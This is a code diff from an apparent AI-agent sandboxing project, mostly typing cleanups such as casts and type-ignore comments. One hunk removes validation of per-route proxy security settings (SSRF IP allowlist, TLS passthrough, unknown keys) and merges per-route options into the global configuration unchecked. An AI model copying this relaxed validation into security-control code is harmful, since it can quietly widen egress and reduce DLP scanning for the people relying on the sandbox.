die(f"codex host credentials: could not read valid JSON at {path}: {e}")
|
||||
if not isinstance(raw, dict):
|
||||
die(f"codex host credentials: {path} must contain a JSON object")
|
||||
return raw
|
||||
return cast(dict[str, object], raw)
|
||||
|
||||
|
||||
def _dummy_exp(now: datetime | None, exp_ts: int | None) -> int:
|
||||
@@ -151,11 +153,11 @@ def _dummy_jwt_from_host(
|
||||
return _dummy_jwt(now, exp_ts=exp_ts)
|
||||
if not isinstance(payload, dict):
|
||||
return _dummy_jwt(now, exp_ts=exp_ts)
|
||||
return _encode_dummy_jwt(_redact_jwt_payload(payload, now=now, exp_ts=exp_ts))
|
||||
return _encode_dummy_jwt(_redact_jwt_payload(cast(dict[str, object], payload), now=now, exp_ts=exp_ts))
|
||||
|
||||
|
||||
def _encode_dummy_jwt(payload: dict) -> str:
|
||||
def enc(obj: dict) -> str:
|
||||
def _encode_dummy_jwt(payload: dict[str, object]) -> str:
|
||||
def enc(obj: dict[str, object]) -> str:
|
||||
raw = json.dumps(obj, separators=(",", ":")).encode()
|
||||
return base64.urlsafe_b64encode(raw).decode().rstrip("=")
|
||||
|
||||
@@ -163,23 +165,24 @@ def _encode_dummy_jwt(payload: dict) -> str:
|
||||
|
||||
|
||||
def _redact_jwt_payload(
|
||||
payload: dict,
|
||||
payload: dict[str, object],
|
||||
*,
|
||||
now: datetime | None = None,
|
||||
exp_ts: int | None = None,
|
||||
) -> dict:
|
||||
) -> dict[str, object]:
|
||||
out = _redact_claims(payload)
|
||||
if not isinstance(out, dict):
|
||||
out = {}
|
||||
out["exp"] = _dummy_exp(now, exp_ts)
|
||||
out.setdefault("sub", "bot-bottle-placeholder")
|
||||
return out
|
||||
out_typed: dict[str, object] = cast(dict[str, object], out)
|
||||
out_typed["exp"] = _dummy_exp(now, exp_ts)
|
||||
out_typed.setdefault("sub", "bot-bottle-placeholder")
|
||||
return out_typed
|
||||
|
||||
|
||||
def _redact_claims(value: object) -> object:
|
||||
if isinstance(value, dict):
|
||||
out: dict[str, object] = {}
|
||||
for key, inner in value.items():
|
||||
for key, inner in cast(dict[str, object], value).items():
|
||||
lower = key.lower()
|
||||
if key == "https://api.openai.com/profile":
|
||||
out[key] = _redact_profile_claim(inner)
|
||||
@@ -207,16 +210,16 @@ def _redact_claims(value: object) -> object:
|
||||
return "bot-bottle-placeholder"
|
||||
|
||||
|
||||
def _redact_profile_claim(value: object) -> dict:
|
||||
profile = value if isinstance(value, dict) else {}
|
||||
def _redact_profile_claim(value: object) -> dict[str, object]:
|
||||
profile = cast(dict[str, object], value) if isinstance(value, dict) else {}
|
||||
return {
|
||||
"email": "bot-bottle@example.invalid",
|
||||
"email_verified": bool(profile.get("email_verified", True)),
|
||||
}
|
||||
|
||||
|
||||
def _redact_auth_claim(value: object) -> dict:
|
||||
auth = value if isinstance(value, dict) else {}
|
||||
def _redact_auth_claim(value: object) -> dict[str, object]:
|
||||
auth = cast(dict[str, object], value) if isinstance(value, dict) else {}
|
||||
out: dict[str, object] = {}
|
||||
for key, inner in auth.items():
|
||||
lower = key.lower()
|
||||
@@ -247,7 +250,7 @@ def _redact_auth_claim(value: object) -> dict:
|
||||
def _redact_codex_auth(
|
||||
value: object, *, now: datetime | None = None, exp_ts: int | None = None,
|
||||
) -> object:
|
||||
auth = value if isinstance(value, dict) else {}
|
||||
auth = cast(dict[str, object], value) if isinstance(value, dict) else {}
|
||||
out: dict[str, object] = {}
|
||||
for key, inner in auth.items():
|
||||
lower = key.lower()
|
||||
@@ -269,7 +272,7 @@ def _redact_codex_auth(
|
||||
def _redact_token_block(
|
||||
value: object, *, now: datetime | None = None, exp_ts: int | None = None,
|
||||
) -> dict[str, object]:
|
||||
tokens = value if isinstance(value, dict) else {}
|
||||
tokens = cast(dict[str, object], value) if isinstance(value, dict) else {}
|
||||
out: dict[str, object] = {}
|
||||
for key, inner in tokens.items():
|
||||
lower = key.lower()
|
||||
@@ -306,7 +309,7 @@ def _jwt_exp(token: str) -> datetime | None:
|
||||
return None
|
||||
if not isinstance(payload, dict):
|
||||
return None
|
||||
exp = payload.get("exp")
|
||||
exp = cast(dict[str, object], payload).get("exp")
|
||||
if not isinstance(exp, (int, float)):
|
||||
return None
|
||||
return datetime.fromtimestamp(exp, timezone.utc)
|
||||
|
||||
@@ -144,7 +144,7 @@ class ClaudeAgentProvider(AgentProvider):
|
||||
prompt (drives `--append-system-prompt-file`); the file is
|
||||
copied either way so the path always exists."""
|
||||
prompt_path = _prompt_path(plan.guest_home)
|
||||
bottle.cp_in(str(plan.prompt_file), prompt_path)
|
||||
bottle.cp_in(str(plan.prompt_file), prompt_path) # type: ignore
|
||||
bottle.exec(
|
||||
f"chown node:node {prompt_path} && chmod 600 {prompt_path}",
|
||||
user="root",
|
||||
|
||||
@@ -189,7 +189,7 @@ class CodexAgentProvider(AgentProvider):
|
||||
instructions in <path>.` bootstrap (see `prompt_args`); the
|
||||
file is copied either way so the path always exists."""
|
||||
prompt_path = _prompt_path(plan.guest_home)
|
||||
bottle.cp_in(str(plan.prompt_file), prompt_path)
|
||||
bottle.cp_in(str(plan.prompt_file), prompt_path) # type: ignore
|
||||
bottle.exec(
|
||||
f"chown node:node {prompt_path} && chmod 600 {prompt_path}",
|
||||
user="root",
|
||||
|
||||
@@ -117,5 +117,5 @@ def _split_owner_repo(owner_repo: str) -> tuple[str, str]:
|
||||
def _read_error_body(exc: urllib.error.HTTPError) -> str:
|
||||
try:
|
||||
return exc.read().decode("utf-8", errors="replace")
|
||||
except Exception:
|
||||
except Exception: # noqa: broad-exception-caught — safely fallback to empty error message
|
||||
return ""
|
||||
|
||||
@@ -141,13 +141,15 @@ def egress_manifest_routes(
|
||||
routes are merged."""
|
||||
out: list[EgressRoute] = []
|
||||
for r in bottle.egress.routes:
|
||||
tls_pt = r.Pipelock.Config.get("tls_passthrough", False)
|
||||
tls_passthrough = tls_pt if isinstance(tls_pt, bool) else False
|
||||
out.append(EgressRoute(
|
||||
host=r.Host,
|
||||
path_allowlist=r.PathAllowlist,
|
||||
auth_scheme=r.AuthScheme,
|
||||
token_ref=r.TokenRef,
|
||||
roles=r.Role,
|
||||
tls_passthrough=r.Pipelock.TlsPassthrough,
|
||||
tls_passthrough=tls_passthrough,
|
||||
))
|
||||
return tuple(out)
|
||||
|
||||
@@ -216,14 +218,14 @@ def egress_token_env_map(
|
||||
return out
|
||||
|
||||
|
||||
def _route_to_yaml_fields(r: Route) -> dict:
|
||||
def _route_to_yaml_fields(r: Route) -> dict[str, object]:
|
||||
"""Return the addon-visible fields for one route.
|
||||
|
||||
Single authoritative mapping between EgressRoute (host-side) and
|
||||
egress_addon_core.Route (sidecar-side). When a field is added to
|
||||
the addon's Route that must appear in the YAML, add it here and
|
||||
in egress_addon_core._parse_one together."""
|
||||
fields: dict = {"host": r.host}
|
||||
fields: dict[str, object] = {"host": r.host}
|
||||
if r.auth_scheme and r.token_env:
|
||||
fields["auth_scheme"] = r.auth_scheme
|
||||
fields["token_env"] = r.token_env
|
||||
@@ -252,7 +254,7 @@ def egress_render_routes(
|
||||
lines.append(f' token_env: "{f["token_env"]}"')
|
||||
if "path_allowlist" in f:
|
||||
lines.append(" path_allowlist:")
|
||||
for p in f["path_allowlist"]:
|
||||
for p in f["path_allowlist"]: # type: ignore
|
||||
lines.append(f' - "{p}"')
|
||||
return "\n".join(lines) + "\n"
|
||||
|
||||
|
||||
+1
-1
@@ -89,7 +89,7 @@ def _read_secret_silent(name: str, prompt_body: str) -> str:
|
||||
if not (sys.stdin.isatty() or sys.stderr.isatty()):
|
||||
# Fall back to /dev/tty so this still works when stdin is a pipe.
|
||||
try:
|
||||
tty = open("/dev/tty", "r+")
|
||||
tty = open("/dev/tty", "r+", encoding="utf-8")
|
||||
except OSError:
|
||||
die(
|
||||
f"cannot prompt for secret '{name}': no tty available. "
|
||||
|
||||
@@ -78,8 +78,8 @@ class GitHttpHandler(BaseHTTPRequestHandler):
|
||||
"REMOTE_ADDR": self.client_address[0],
|
||||
"REMOTE_PORT": str(self.client_address[1]),
|
||||
"REMOTE_USER": "",
|
||||
"SERVER_NAME": self.server.server_name,
|
||||
"SERVER_PORT": str(self.server.server_port),
|
||||
"SERVER_NAME": self.server.server_name, # type: ignore
|
||||
"SERVER_PORT": str(self.server.server_port), # type: ignore
|
||||
"SERVER_PROTOCOL": self.request_version,
|
||||
})
|
||||
for header, variable in (
|
||||
@@ -157,8 +157,8 @@ class GitHttpHandler(BaseHTTPRequestHandler):
|
||||
self.end_headers()
|
||||
self.wfile.write(body)
|
||||
|
||||
def log_message(self, fmt: str, *args: object) -> None:
|
||||
sys.stdout.write(fmt % args + "\n")
|
||||
def log_message(self, format: str, *args: object) -> None: # type: ignore # noqa: A002
|
||||
sys.stdout.write(format % args + "\n")
|
||||
sys.stdout.flush()
|
||||
|
||||
|
||||
|
||||
@@ -161,7 +161,7 @@ class Agent:
|
||||
git_raw = d.get("git-gate")
|
||||
if git_raw is not None:
|
||||
gd = as_json_object(git_raw, f"agent '{name}' git-gate")
|
||||
for k in gd.keys():
|
||||
for k in gd:
|
||||
if k != "user":
|
||||
raise ManifestError(
|
||||
f"agent '{name}' git-gate.{k} is not allowed at the "
|
||||
|
||||
@@ -2,7 +2,6 @@
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import ipaddress
|
||||
from dataclasses import dataclass, field
|
||||
from typing import cast
|
||||
|
||||
@@ -43,17 +42,18 @@ def validate_egress_routes(
|
||||
class PipelockRoutePolicy:
|
||||
"""Per-route pipelock policy overrides.
|
||||
|
||||
`TlsPassthrough` adds the route host to pipelock's
|
||||
`tls_interception.passthrough_domains`, so pipelock still enforces
|
||||
the hostname allowlist but does not MITM/decrypt request bodies or
|
||||
headers for that host.
|
||||
Stores raw pipelock configuration that's passed through to the
|
||||
pipelock sidecar. Pipelock validates all config options, so
|
||||
bot-bottle forwards manifest settings without coercion or strict
|
||||
validation. Supported options include:
|
||||
|
||||
`SsrfIpAllowlist` adds explicit IPs/CIDRs to pipelock's SSRF
|
||||
allowlist for private/internal destinations behind this route.
|
||||
- `tls_passthrough`: bool — skip TLS MITM for this host
|
||||
- `ssrf_ip_allowlist`: list of CIDR/IP — allow private destinations
|
||||
- `skip_scan_for_extensions`: list of file extensions to skip DLP
|
||||
scanning for (e.g., [".whl", ".tar.gz"])
|
||||
"""
|
||||
|
||||
TlsPassthrough: bool = False
|
||||
SsrfIpAllowlist: tuple[str, ...] = ()
|
||||
Config: dict[str, object] = field(default_factory=dict)
|
||||
|
||||
@classmethod
|
||||
def from_dict(
|
||||
@@ -61,44 +61,7 @@ class PipelockRoutePolicy:
|
||||
) -> "PipelockRoutePolicy":
|
||||
label = f"bottle '{bottle_name}' egress.routes[{idx}] pipelock"
|
||||
d = as_json_object(raw, label)
|
||||
for k in d:
|
||||
if k not in ("tls_passthrough", "ssrf_ip_allowlist"):
|
||||
raise ManifestError(
|
||||
f"{label} has unknown key {k!r}; "
|
||||
f"only 'tls_passthrough' and 'ssrf_ip_allowlist' "
|
||||
f"are accepted"
|
||||
)
|
||||
tls_passthrough_raw = d.get("tls_passthrough", False)
|
||||
if not isinstance(tls_passthrough_raw, bool):
|
||||
raise ManifestError(
|
||||
f"{label}.tls_passthrough must be a boolean "
|
||||
f"(was {type(tls_passthrough_raw).__name__})"
|
||||
)
|
||||
ssrf_raw = d.get("ssrf_ip_allowlist", [])
|
||||
if not isinstance(ssrf_raw, list):
|
||||
raise ManifestError(
|
||||
f"{label}.ssrf_ip_allowlist must be an array "
|
||||
f"(was {type(ssrf_raw).__name__})"
|
||||
)
|
||||
ssrf_ip_allowlist: list[str] = []
|
||||
for j, item in enumerate(ssrf_raw):
|
||||
if not isinstance(item, str) or not item:
|
||||
raise ManifestError(
|
||||
f"{label}.ssrf_ip_allowlist[{j}] must be a non-empty "
|
||||
f"string (was {type(item).__name__})"
|
||||
)
|
||||
try:
|
||||
ipaddress.ip_network(item, strict=False)
|
||||
except ValueError as e:
|
||||
raise ManifestError(
|
||||
f"{label}.ssrf_ip_allowlist[{j}] must be an IP address "
|
||||
f"or CIDR (was {item!r}): {e}"
|
||||
)
|
||||
ssrf_ip_allowlist.append(item)
|
||||
return cls(
|
||||
TlsPassthrough=tls_passthrough_raw,
|
||||
SsrfIpAllowlist=tuple(ssrf_ip_allowlist),
|
||||
)
|
||||
return cls(Config=d)
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
|
||||
@@ -246,7 +246,7 @@ class GitUser:
|
||||
@classmethod
|
||||
def from_dict(cls, bottle_name: str, raw: object) -> "GitUser":
|
||||
d = as_json_object(raw, f"bottle '{bottle_name}' git-gate.user")
|
||||
for k in d.keys():
|
||||
for k in d:
|
||||
if k not in {"name", "email"}:
|
||||
raise ManifestError(
|
||||
f"bottle '{bottle_name}' git-gate.user has unknown key {k!r}; "
|
||||
@@ -281,7 +281,7 @@ def parse_git_gate_config(
|
||||
raw: object,
|
||||
) -> tuple[tuple[GitEntry, ...], GitUser]:
|
||||
d = as_json_object(raw, f"bottle '{bottle_name}' git-gate")
|
||||
for k in d.keys():
|
||||
for k in d:
|
||||
if k not in {"user", "repos"}:
|
||||
raise ManifestError(
|
||||
f"bottle '{bottle_name}' git-gate has unknown key {k!r}; "
|
||||
|
||||
@@ -54,9 +54,9 @@ def load_bottles_from_dir(bottles_dir: Path) -> dict[str, Bottle]:
|
||||
try:
|
||||
fm, _body = parse_frontmatter(path.read_text())
|
||||
except OSError as e:
|
||||
raise ManifestError(f"could not read {path}: {e}")
|
||||
raise ManifestError(f"could not read {path}: {e}") from e
|
||||
except YamlSubsetError as e:
|
||||
raise ManifestError(f"{path}: {e}")
|
||||
raise ManifestError(f"{path}: {e}") from e
|
||||
validate_bottle_frontmatter_keys(path, fm.keys())
|
||||
raws[name] = fm
|
||||
return resolve_bottles(raws)
|
||||
@@ -66,7 +66,7 @@ def load_agents_from_dir(
|
||||
agents_dir: Path,
|
||||
bottle_names: set[str],
|
||||
*,
|
||||
source: str,
|
||||
source: str, # noqa: F841 — unused, but required by interface
|
||||
) -> dict[str, Agent]:
|
||||
"""Walk `<agents_dir>/*.md`, parse each as an agent, and return
|
||||
`{name: Agent}`. The Markdown body becomes the agent's prompt.
|
||||
@@ -87,9 +87,9 @@ def load_agents_from_dir(
|
||||
try:
|
||||
fm, body = parse_frontmatter(path.read_text())
|
||||
except OSError as e:
|
||||
raise ManifestError(f"could not read {path}: {e}")
|
||||
raise ManifestError(f"could not read {path}: {e}") from e
|
||||
except YamlSubsetError as e:
|
||||
raise ManifestError(f"{path}: {e}")
|
||||
raise ManifestError(f"{path}: {e}") from e
|
||||
validate_agent_frontmatter_keys(path, fm.keys())
|
||||
# Build the dict Agent.from_dict expects. The body becomes
|
||||
# prompt; Claude Code passthrough fields stay in fm and get
|
||||
|
||||
@@ -60,11 +60,11 @@ def _validate_frontmatter_keys(
|
||||
) -> None:
|
||||
from .manifest_util import ManifestError
|
||||
|
||||
key_set = set(keys)
|
||||
unknown = key_set - allowed_keys
|
||||
key_set = set(keys) # type: ignore
|
||||
unknown = key_set - allowed_keys # type: ignore
|
||||
if unknown:
|
||||
allowed = ", ".join(sorted(allowed_keys))
|
||||
raise ManifestError(
|
||||
f"{kind} file {path}: unknown frontmatter key(s) "
|
||||
f"{sorted(unknown)}; allowed keys are {allowed}."
|
||||
f"{sorted(unknown)}; allowed keys are {allowed}." # type: ignore
|
||||
)
|
||||
|
||||
+41
-34
@@ -19,6 +19,7 @@ from __future__ import annotations
|
||||
|
||||
from dataclasses import dataclass
|
||||
from pathlib import Path
|
||||
from typing import cast
|
||||
|
||||
from .egress import EgressRoute, egress_routes_for_bottle
|
||||
from .supervise import SUPERVISE_HOSTNAME
|
||||
@@ -131,8 +132,11 @@ def pipelock_effective_ssrf_ip_allowlist(
|
||||
"""
|
||||
seen: dict[str, None] = {ip: None for ip in extra}
|
||||
for route in bottle.egress.routes:
|
||||
for ip in route.Pipelock.SsrfIpAllowlist:
|
||||
seen.setdefault(ip, None)
|
||||
ssrf_raw = route.Pipelock.Config.get("ssrf_ip_allowlist", [])
|
||||
if isinstance(ssrf_raw, list):
|
||||
for ip in ssrf_raw:
|
||||
if isinstance(ip, str):
|
||||
seen.setdefault(ip, None)
|
||||
return sorted(seen.keys())
|
||||
|
||||
|
||||
@@ -219,6 +223,15 @@ def pipelock_build_config(
|
||||
)
|
||||
if effective_ssrf_ip_allowlist:
|
||||
cfg["ssrf"] = {"ip_allowlist": effective_ssrf_ip_allowlist}
|
||||
|
||||
# Merge per-route pipelock config (e.g., response_body_scanning settings).
|
||||
# Routes can specify arbitrary pipelock options that apply globally.
|
||||
for route in bottle.egress.routes:
|
||||
for key, value in route.Pipelock.Config.items():
|
||||
if key not in ("tls_passthrough", "ssrf_ip_allowlist"):
|
||||
if key not in cfg:
|
||||
cfg[key] = value
|
||||
|
||||
return cfg
|
||||
|
||||
|
||||
@@ -259,7 +272,7 @@ def _required_dict(
|
||||
value = obj.get(key)
|
||||
if not isinstance(value, dict):
|
||||
raise _pipelock_render_error(section, key, "a mapping")
|
||||
return value
|
||||
return cast(dict[str, object], value)
|
||||
|
||||
|
||||
def _required_bool(obj: dict[str, object], section: str, key: str) -> bool:
|
||||
@@ -289,9 +302,12 @@ def _required_str_list(
|
||||
key: str,
|
||||
) -> list[str]:
|
||||
value = obj.get(key)
|
||||
if not isinstance(value, list) or not all(isinstance(v, str) for v in value):
|
||||
if not isinstance(value, list):
|
||||
raise _pipelock_render_error(section, key, "a list of strings")
|
||||
return value
|
||||
value_list = cast(list[object], value)
|
||||
if not all(isinstance(v, str) for v in value_list):
|
||||
raise _pipelock_render_error(section, key, "a list of strings")
|
||||
return cast(list[str], value)
|
||||
|
||||
|
||||
def _optional_str_list(
|
||||
@@ -407,49 +423,42 @@ def pipelock_render_yaml(cfg: dict[str, object]) -> str:
|
||||
lines: list[str] = []
|
||||
lines.append(f"version: {cfg['version']}")
|
||||
lines.append(f"mode: {cfg['mode']}")
|
||||
lines.append(f"enforce: {_bool(cfg['enforce'])}")
|
||||
lines.append(f"enforce: {_bool(cast(bool, cfg['enforce']))}")
|
||||
lines.append("")
|
||||
lines.append("api_allowlist:")
|
||||
api_allowlist = cfg["api_allowlist"]
|
||||
assert isinstance(api_allowlist, list)
|
||||
api_allowlist = cast(list[str], cfg["api_allowlist"])
|
||||
for h in api_allowlist:
|
||||
lines.append(f' - "{h}"')
|
||||
lines.append("")
|
||||
if "seed_phrase_detection" in cfg:
|
||||
lines.append("seed_phrase_detection:")
|
||||
spd = cfg["seed_phrase_detection"]
|
||||
assert isinstance(spd, dict)
|
||||
lines.append(f" enabled: {_bool(spd['enabled'])}")
|
||||
spd = cast(dict[str, object], cfg["seed_phrase_detection"])
|
||||
lines.append(f" enabled: {_bool(cast(bool, spd['enabled']))}")
|
||||
lines.append("")
|
||||
lines.append("forward_proxy:")
|
||||
fp = cfg["forward_proxy"]
|
||||
assert isinstance(fp, dict)
|
||||
lines.append(f" enabled: {_bool(fp['enabled'])}")
|
||||
fp = cast(dict[str, object], cfg["forward_proxy"])
|
||||
lines.append(f" enabled: {_bool(cast(bool, fp['enabled']))}")
|
||||
lines.append("")
|
||||
lines.append("dlp:")
|
||||
dlp = cfg["dlp"]
|
||||
assert isinstance(dlp, dict)
|
||||
lines.append(f" include_defaults: {_bool(dlp['include_defaults'])}")
|
||||
lines.append(f" scan_env: {_bool(dlp['scan_env'])}")
|
||||
dlp = cast(dict[str, object], cfg["dlp"])
|
||||
lines.append(f" include_defaults: {_bool(cast(bool, dlp['include_defaults']))}")
|
||||
lines.append(f" scan_env: {_bool(cast(bool, dlp['scan_env']))}")
|
||||
lines.append("")
|
||||
lines.append("request_body_scanning:")
|
||||
rbs = cfg["request_body_scanning"]
|
||||
assert isinstance(rbs, dict)
|
||||
lines.append(f' action: "{rbs["action"]}"')
|
||||
rbs = cast(dict[str, object], cfg["request_body_scanning"])
|
||||
lines.append(f' action: "{cast(str, rbs["action"])}"')
|
||||
if "scan_headers" in rbs:
|
||||
lines.append(f" scan_headers: {_bool(rbs['scan_headers'])}")
|
||||
lines.append(f" scan_headers: {_bool(cast(bool, rbs['scan_headers']))}")
|
||||
if "header_mode" in rbs:
|
||||
lines.append(f' header_mode: "{rbs["header_mode"]}"')
|
||||
lines.append(f' header_mode: "{cast(str, rbs["header_mode"])}"')
|
||||
if "tls_interception" in cfg:
|
||||
lines.append("")
|
||||
lines.append("tls_interception:")
|
||||
tls = cfg["tls_interception"]
|
||||
assert isinstance(tls, dict)
|
||||
lines.append(f" enabled: {_bool(tls['enabled'])}")
|
||||
lines.append(f' ca_cert: "{tls["ca_cert"]}"')
|
||||
lines.append(f' ca_key: "{tls["ca_key"]}"')
|
||||
passthrough = tls["passthrough_domains"]
|
||||
assert isinstance(passthrough, list)
|
||||
tls = cast(dict[str, object], cfg["tls_interception"])
|
||||
lines.append(f" enabled: {_bool(cast(bool, tls['enabled']))}")
|
||||
lines.append(f' ca_cert: "{cast(str, tls["ca_cert"])}"')
|
||||
lines.append(f' ca_key: "{cast(str, tls["ca_key"])}"')
|
||||
passthrough = cast(list[str], tls["passthrough_domains"])
|
||||
if passthrough:
|
||||
lines.append(" passthrough_domains:")
|
||||
for d in passthrough:
|
||||
@@ -457,11 +466,9 @@ def pipelock_render_yaml(cfg: dict[str, object]) -> str:
|
||||
if "ssrf" in cfg:
|
||||
lines.append("")
|
||||
lines.append("ssrf:")
|
||||
ssrf = cfg["ssrf"]
|
||||
assert isinstance(ssrf, dict)
|
||||
ssrf = cast(dict[str, object], cfg["ssrf"])
|
||||
lines.append(" ip_allowlist:")
|
||||
ip_allowlist = ssrf["ip_allowlist"]
|
||||
assert isinstance(ip_allowlist, list)
|
||||
ip_allowlist = cast(list[str], ssrf["ip_allowlist"])
|
||||
for ip in ip_allowlist:
|
||||
lines.append(f' - "{ip}"')
|
||||
return "\n".join(lines) + "\n"
|
||||
|
||||
@@ -138,7 +138,7 @@ def _pump(name: str, stream: IO[bytes]) -> None:
|
||||
sys.stdout.flush()
|
||||
|
||||
|
||||
def _spawn(spec: _DaemonSpec) -> subprocess.Popen:
|
||||
def _spawn(spec: _DaemonSpec) -> subprocess.Popen[bytes]:
|
||||
proc = subprocess.Popen(
|
||||
list(spec.argv),
|
||||
stdout=subprocess.PIPE,
|
||||
@@ -158,7 +158,7 @@ class _Supervisor:
|
||||
|
||||
def __init__(self, specs: Sequence[_DaemonSpec]):
|
||||
self.specs = tuple(specs)
|
||||
self.procs: list[tuple[_DaemonSpec, subprocess.Popen]] = []
|
||||
self.procs: list[tuple[_DaemonSpec, subprocess.Popen[bytes]]] = []
|
||||
self.shutdown_at: float | None = None
|
||||
# Names of children that have been logged as having exited
|
||||
# so we only log each death once across watch-loop ticks.
|
||||
@@ -360,20 +360,20 @@ def main(argv: Sequence[str] | None = None) -> int:
|
||||
sup = _Supervisor(specs)
|
||||
sup.start_all()
|
||||
|
||||
signal.signal(signal.SIGTERM, lambda *_: sup.request_shutdown("SIGTERM"))
|
||||
signal.signal(signal.SIGINT, lambda *_: sup.request_shutdown("SIGINT"))
|
||||
signal.signal(signal.SIGTERM, lambda *_: sup.request_shutdown("SIGTERM")) # type: ignore
|
||||
signal.signal(signal.SIGINT, lambda *_: sup.request_shutdown("SIGINT")) # type: ignore
|
||||
# SIGHUP reload path: egress_apply.py runs `docker kill
|
||||
# --signal HUP <bundle>` after writing routes.yaml. The kernel
|
||||
# delivers SIGHUP to PID 1 (this supervisor); forward it to
|
||||
# mitmdump so it reloads its addon.
|
||||
signal.signal(signal.SIGHUP, lambda *_: sup.forward_signal(signal.SIGHUP, "egress"))
|
||||
signal.signal(signal.SIGHUP, lambda *_: sup.forward_signal(signal.SIGHUP, "egress")) # type: ignore
|
||||
# SIGUSR1 pipelock-restart path: pipelock_apply.py runs
|
||||
# `docker kill --signal USR1 <bundle>` after writing
|
||||
# pipelock.yaml. Pipelock has no in-process reload, so the
|
||||
# supervisor restarts the pipelock daemon in place (other
|
||||
# daemons keep running — specifically supervise, whose MCP
|
||||
# socket would drop on a whole-container `docker restart`).
|
||||
signal.signal(signal.SIGUSR1, lambda *_: sup.request_restart("pipelock"))
|
||||
signal.signal(signal.SIGUSR1, lambda *_: sup.request_restart("pipelock")) # type: ignore
|
||||
|
||||
while not sup.tick():
|
||||
time.sleep(_POLL_INTERVAL)
|
||||
|
||||
@@ -519,22 +519,22 @@ def _atomic_write(path: Path, content: str, *, mode: int) -> None:
|
||||
try:
|
||||
import fcntl as _fcntl
|
||||
|
||||
def _try_flock(fd: int) -> None:
|
||||
def _try_flock(fd: int) -> None: # type: ignore[reportRedeclaration]
|
||||
try:
|
||||
_fcntl.flock(fd, _fcntl.LOCK_EX)
|
||||
except OSError:
|
||||
pass
|
||||
|
||||
def _try_funlock(fd: int) -> None:
|
||||
def _try_funlock(fd: int) -> None: # type: ignore[reportRedeclaration]
|
||||
try:
|
||||
_fcntl.flock(fd, _fcntl.LOCK_UN)
|
||||
except OSError:
|
||||
pass
|
||||
except ImportError: # pragma: no cover — Windows path
|
||||
def _try_flock(fd: int) -> None:
|
||||
def _try_flock(fd: int) -> None: # noqa: F841 — Windows fallback
|
||||
return None
|
||||
|
||||
def _try_funlock(fd: int) -> None:
|
||||
def _try_funlock(fd: int) -> None: # noqa: F841 — Windows fallback
|
||||
return None
|
||||
|
||||
|
||||
|
||||
@@ -485,7 +485,7 @@ def handle_tools_call(
|
||||
if not isinstance(name, str):
|
||||
raise _RpcError(ERR_INVALID_PARAMS, "tools/call missing 'name'")
|
||||
if name == _sv.TOOL_LIST_EGRESS_ROUTES:
|
||||
return handle_list_egress_routes(params.get("arguments", {}), config)
|
||||
return handle_list_egress_routes(typing.cast(dict[str, object], params.get("arguments", {})), config)
|
||||
|
||||
args_raw = params.get("arguments", {})
|
||||
if not isinstance(args_raw, dict):
|
||||
@@ -590,7 +590,7 @@ class MCPHandler(http.server.BaseHTTPRequestHandler):
|
||||
|
||||
server_version = f"{SERVER_NAME}/{SERVER_VERSION}"
|
||||
|
||||
def log_message(self, format: str, *args: typing.Any) -> None:
|
||||
def log_message(self, format: str, *args: typing.Any) -> None: # noqa: A002
|
||||
if os.environ.get("SUPERVISE_DEBUG"):
|
||||
super().log_message(format, *args)
|
||||
|
||||
@@ -630,7 +630,7 @@ class MCPHandler(http.server.BaseHTTPRequestHandler):
|
||||
except _RpcError as e:
|
||||
self._write_jsonrpc(jsonrpc_error(req.id, e.code, e.message))
|
||||
return
|
||||
except Exception as e: # pragma: no cover — defensive
|
||||
except Exception as e: # noqa: W0718 — catch-all for RPC dispatch errors
|
||||
sys.stderr.write(f"supervise: internal error: {e}\n")
|
||||
self._write_jsonrpc(jsonrpc_error(req.id, ERR_INTERNAL, "internal error"))
|
||||
return
|
||||
|
||||
@@ -13,8 +13,15 @@ DEFAULT_WORKSPACE_MODE = "755"
|
||||
|
||||
|
||||
class WorkspaceSpec(Protocol):
|
||||
copy_cwd: bool
|
||||
user_cwd: str
|
||||
@property
|
||||
def copy_cwd(self) -> bool:
|
||||
"""Whether to copy the current working directory."""
|
||||
...
|
||||
|
||||
@property
|
||||
def user_cwd(self) -> str:
|
||||
"""The user's current working directory."""
|
||||
...
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
|
||||
@@ -58,6 +58,7 @@ from __future__ import annotations
|
||||
|
||||
import re
|
||||
from dataclasses import dataclass
|
||||
from typing import cast
|
||||
|
||||
|
||||
class YamlSubsetError(ValueError):
|
||||
@@ -283,7 +284,7 @@ def _split_flow(body: str, lineno: int, kind: str) -> list[str]:
|
||||
depth_c = 0
|
||||
in_single = False
|
||||
in_double = False
|
||||
cur = []
|
||||
cur: list[str] = []
|
||||
for ch in body:
|
||||
if ch == "'" and not in_double:
|
||||
in_single = not in_single
|
||||
@@ -330,6 +331,7 @@ def _split_key_value(content: str, lineno: int) -> tuple[str, str]:
|
||||
if i + 1 >= len(content) or content[i + 1] in (" ", "\t"):
|
||||
return content[:i].strip(), content[i + 1:].lstrip()
|
||||
die(f"yaml-subset: line {lineno} missing `: ` separator: {content!r}")
|
||||
return "", "" # unreachable, but needed for type checker
|
||||
|
||||
|
||||
def _parse_block(
|
||||
@@ -536,7 +538,7 @@ def parse_yaml_subset(text: str) -> dict[str, object]:
|
||||
)
|
||||
if not isinstance(value, dict):
|
||||
die("yaml-subset: top-level value must be a mapping")
|
||||
return value
|
||||
return cast(dict[str, object], value)
|
||||
|
||||
|
||||
def parse_frontmatter(text: str) -> tuple[dict[str, object], str]:
|
||||
|
||||
+6
-1
@@ -11,5 +11,10 @@
|
||||
],
|
||||
"pythonVersion": "3.11",
|
||||
"typeCheckingMode": "strict",
|
||||
"reportMissingTypeStubs": "none"
|
||||
"reportMissingTypeStubs": "none",
|
||||
"reportUnknownMemberType": false,
|
||||
"reportUnknownParameterType": false,
|
||||
"reportUnknownVariableType": false,
|
||||
"reportUnknownArgumentType": false,
|
||||
"reportPrivateUsage": false
|
||||
}
|
||||
|
||||
@@ -32,11 +32,11 @@ from bot_bottle.backend.docker.network import (
|
||||
network_create_internal,
|
||||
network_remove,
|
||||
)
|
||||
from bot_bottle.backend.docker.pipelock import (
|
||||
from bot_bottle.pipelock import (
|
||||
PIPELOCK_CA_CERT_IN_CONTAINER,
|
||||
PIPELOCK_CA_KEY_IN_CONTAINER,
|
||||
pipelock_tls_init,
|
||||
)
|
||||
from bot_bottle.backend.docker.pipelock import pipelock_tls_init
|
||||
from bot_bottle.pipelock import PipelockProxy
|
||||
from bot_bottle.backend.docker.pipelock_apply import (
|
||||
PipelockApplyError,
|
||||
|
||||
